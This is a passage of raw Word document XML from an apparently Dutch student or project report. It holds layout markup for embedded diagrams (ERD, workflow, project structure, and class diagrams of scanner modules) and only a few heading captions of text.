                      <a:ext cx="6536055" cy="5855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60D6" w:rsidRPr="002E2EF6">
        <w:t>ERD MODEL</w:t>
      </w:r>
      <w:r w:rsidR="00487AE4" w:rsidRPr="002E2EF6">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFD6E81" w14:textId="2CB7A234" w:rsidR="00487AE4" w:rsidRPr="00537717" w:rsidRDefault="007460D6" w:rsidP="003527DB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253247488" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="423F6092" wp14:editId="67BF1D7D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-897890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="848" name="Rectangle 8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45E8C" id="Rectangle 848" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.25pt;margin-top:-70.65pt;width:25pt;height:1031.7pt;z-index:-2500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H6Z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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00537717" w:rsidRPr="00537717">
        <w:t>Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA425D" w14:textId="6A742BD6" w:rsidR="00487AE4" w:rsidRDefault="00487AE4" w:rsidP="00F241F6"/>
    <w:p w14:paraId="6BC0B2B0" w14:textId="05C2A050" w:rsidR="00487AE4" w:rsidRDefault="00A65BD3" w:rsidP="00F241F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253257728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2ECE3746" wp14:editId="1A5977D1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-520065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>264160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7092950" cy="5366385"/>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136">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7092950" cy="5366385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3770ADD3" w14:textId="77777777" w:rsidR="00143F12" w:rsidRDefault="00143F12">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3398EA9E" w14:textId="350E107A" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00143F12">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253308928" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6106C1F8" wp14:editId="26E62E95">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-905971</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-605155</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="832" name="Rectangle 8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51024" id="Rectangle 832" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.35pt;margin-top:-47.6pt;width:25pt;height:1031.7pt;z-index:-2500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yxPpICAACxBQAADgAAAGRycy9lMm9Eb2MueG1srFRRT9swEH6ftP9g+X0kaWG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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6D8319" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00143F12">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C94ECA" w14:textId="762CF05D" w:rsidR="00143F12" w:rsidRDefault="00143F12" w:rsidP="00143F12">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="008D40E9">
        <w:t>Projectstructuur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0A519" w14:textId="77777777" w:rsidR="00143F12" w:rsidRPr="008D40E9" w:rsidRDefault="00143F12" w:rsidP="00143F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253306880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E2AAAE5" wp14:editId="15EABB81">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4561840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5878195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1933575" cy="955040"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:wrapSquare wrapText="bothSides"/>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Mail.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1933575" cy="955040"/>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3305856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6928130F" wp14:editId="4170266D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4561205</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2442845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1917700" cy="3365500"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:wrapSquare wrapText="bothSides"/>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Model.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1917700" cy="3365500"/>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3303808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="067F06BB" wp14:editId="5231F352">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2211070</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3818255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2157730" cy="2291080"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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DAL.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2157730" cy="2291080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253302784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61508440" wp14:editId="68EE87EE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2207895</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>45085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2165350" cy="3715385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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Console en Core.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2165350" cy="3715385"/>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3304832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21E198E5" wp14:editId="66B33E17">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4498340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>53975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2020570" cy="2277110"/>
            <wp:effectExtent l="0" t="0" r="11430" b="8890"/>
            <wp:wrapSquare wrapText="bothSides"/>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Services.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId141">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2020570" cy="2277110"/>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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0561DB57" wp14:editId="16284A10">
            <wp:extent cx="2083261" cy="6602026"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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rojectstructuur.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2143271" cy="6792204"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2491998C" w14:textId="64FC2051" w:rsidR="00A52CC1" w:rsidRDefault="00A52CC1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E540D" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc495181361"/>
    </w:p>
    <w:p w14:paraId="0110FB3B" w14:textId="77777777" w:rsidR="00180059" w:rsidRDefault="000242C2" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253284352" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C4E319F" wp14:editId="10C54379">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901239</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1013634</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="855" name="Rectangle 85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53D92" id="Rectangle 855" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.95pt;margin-top:-79.75pt;width:25pt;height:1031.7pt;z-index:-2500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nEXJICAACxBQAADgAAAGRycy9lMm9Eb2MueG1srFRRT9swEH6ftP9g+X0kKXS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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00120DEF">
        <w:t>Klasse</w:t>
      </w:r>
      <w:r w:rsidR="00180059">
        <w:t>n Diagrammen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28283D15" w14:textId="1A66F3ED" w:rsidR="00C41B3D" w:rsidRPr="007C4285" w:rsidRDefault="00C41B3D" w:rsidP="00DE58B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B62243" w14:textId="26D6C272" w:rsidR="00AB6653" w:rsidRPr="00DE58B9" w:rsidRDefault="001E691D" w:rsidP="00DE58B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253296640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A493318" wp14:editId="1B06F536">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-137160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>225425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6412865" cy="5829300"/>
                <wp:effectExtent l="0" t="0" r="13335" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21647"/>
                    <wp:lineTo x="21559" y="21647"/>
                    <wp:lineTo x="21559" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="864" name="Rectangle 864"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6412865" cy="58293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F77F4" id="Rectangle 864" o:spid="_x0000_s1026" style="position:absolute;margin-left:-10.8pt;margin-top:17.75pt;width:504.95pt;height:459pt;z-index:2532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" filled="f" strokecolor="#4472c4 [3204]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001E7E3E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253299712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="019DC5AA" wp14:editId="64D83F54">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-137160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6050280</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2031365" cy="1600200"/>
                <wp:effectExtent l="0" t="0" r="26035" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21607" y="21600"/>
                    <wp:lineTo x="21607" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="867" name="Rectangle 867"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2031365"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EDEF8" id="Rectangle 867" o:spid="_x0000_s1026" style="position:absolute;margin-left:-10.8pt;margin-top:476.4pt;width:159.95pt;height:126pt;z-index:2532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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F36877">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253297664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="639AFC92" wp14:editId="17EE479D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4244340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>569595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1651000" cy="800100"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="865" name="Text Box 865"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1651000" cy="8001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4014D74" w14:textId="29AD1193" w:rsidR="002A05E5" w:rsidRPr="00F36877" w:rsidRDefault="002A05E5" w:rsidP="00F36877">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="36"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="36"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Dee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AFC92" id="Text Box 865" o:spid="_x0000_s1264" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:334.2pt;margin-top:44.85pt;width:130pt;height:63pt;z-index:2532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" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="44014D74" w14:textId="29AD1193" w:rsidR="002A05E5" w:rsidRPr="00F36877" w:rsidRDefault="002A05E5" w:rsidP="00F36877">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="36"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="36"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Deel A</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AB6653">
        <w:t xml:space="preserve">Klasse Diagram van de Scan Modules. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CCB501" w14:textId="1B92E696" w:rsidR="009E2309" w:rsidRDefault="00F36877">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668452" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14032C27" wp14:editId="5A2B08DA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="7198995"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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Klasse diagram Deel A.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId143">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="7198995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D6D22C" w14:textId="77777777" w:rsidR="00F36877" w:rsidRDefault="00F36877"/>
    <w:p w14:paraId="2149B83B" w14:textId="77777777" w:rsidR="00F36877" w:rsidRDefault="00F36877"/>
    <w:p w14:paraId="242D6589" w14:textId="77777777" w:rsidR="00F36877" w:rsidRDefault="00F36877"/>
    <w:p w14:paraId="6795CB50" w14:textId="29DAFC3B" w:rsidR="001958CD" w:rsidRDefault="001958CD">
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253295616" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22713D78" wp14:editId="1BE94026">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-718011</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="813" name="Rectangle 81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012A2" id="Rectangle 813" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.85pt;margin-top:-56.5pt;width:25pt;height:1031.7pt;z-index:-2500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SMpICAACxBQAADgAAAGRycy9lMm9Eb2MueG1srFRRT9swEH6ftP9g+X0kaWG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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C6E89" w14:textId="057D0FFC" w:rsidR="000F3896" w:rsidRDefault="000F3896">
      <w:r>
        <w:t>Klasse Diagram van Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C564AB4" w14:textId="475FF7EA" w:rsidR="000F3896" w:rsidRDefault="00CA49A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253300736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F0B5E54" wp14:editId="5DC11D04">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="5908675"/>
            <wp:effectExtent l="0" t="0" r="5080" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>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Klassen Diagram scan.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId144">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="5908675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA88CC3" w14:textId="2C39469A" w:rsidR="000242C2" w:rsidRDefault="000242C2">
